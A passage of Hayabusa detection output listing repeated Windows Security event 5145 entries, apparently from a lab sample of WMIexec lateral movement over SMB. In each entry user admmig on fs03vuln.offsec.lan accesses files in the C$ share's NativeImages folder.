Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 